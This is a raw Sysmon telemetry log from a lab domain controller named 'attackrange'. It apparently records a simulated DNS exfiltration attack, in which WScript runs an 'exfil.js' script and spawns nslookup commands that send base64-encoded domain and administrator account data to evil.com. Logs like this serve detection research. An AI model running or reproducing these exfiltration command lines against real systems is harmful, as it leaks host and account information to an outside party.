154100x8000000000000000208669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.871{2E1864BB-18EA-629A-8343-000000005F02}1352C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-8143-000000005F02}2512C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluceisd.tmp 2>&1 22542200x8000000000000000208668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.762{00000000-0000-0000-0000-000000000000}7536evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.635{00000000-0000-0000-0000-000000000000}4012evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.547{00000000-0000-0000-0000-000000000000}1700evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.471{00000000-0000-0000-0000-000000000000}7224evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.401{00000000-0000-0000-0000-000000000000}5968evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.322{00000000-0000-0000-0000-000000000000}2260evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.255{00000000-0000-0000-0000-000000000000}4596evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{00000000-0000-0000-0000-000000000000}2792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.117{00000000-0000-0000-0000-000000000000}7792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.054{00000000-0000-0000-0000-000000000000}5404evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000208658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.842{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-8243-000000005F02}6108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.842{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-8243-000000005F02}6108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.827{2E1864BB-18EA-629A-8243-000000005F02}61084828C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-8143-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.827{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8243-000000005F02}6108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.811{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.811{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.811{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8143-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.811{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.811{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.811{2E1864BB-18E0-629A-6742-000000005F02}39767396C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-8143-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.815{2E1864BB-18EA-629A-8143-000000005F02}2512C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluceisd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.796{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlddvt.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-18EA-629A-7F43-000000005F02}33886712C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-8043-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8043-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.758{2E1864BB-18EA-629A-7E43-000000005F02}62245400C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-8043-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.768{2E1864BB-18EA-629A-8043-000000005F02}3712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-7E43-000000005F02}6224C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlddvt.tmp 2>&1 10341000x8000000000000000208638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.743{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7F43-000000005F02}3388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.743{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7F43-000000005F02}3388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.727{2E1864BB-18EA-629A-7F43-000000005F02}33886712C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7E43-000000005F02}6224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.727{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7F43-000000005F02}3388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.711{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.711{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.711{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.711{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 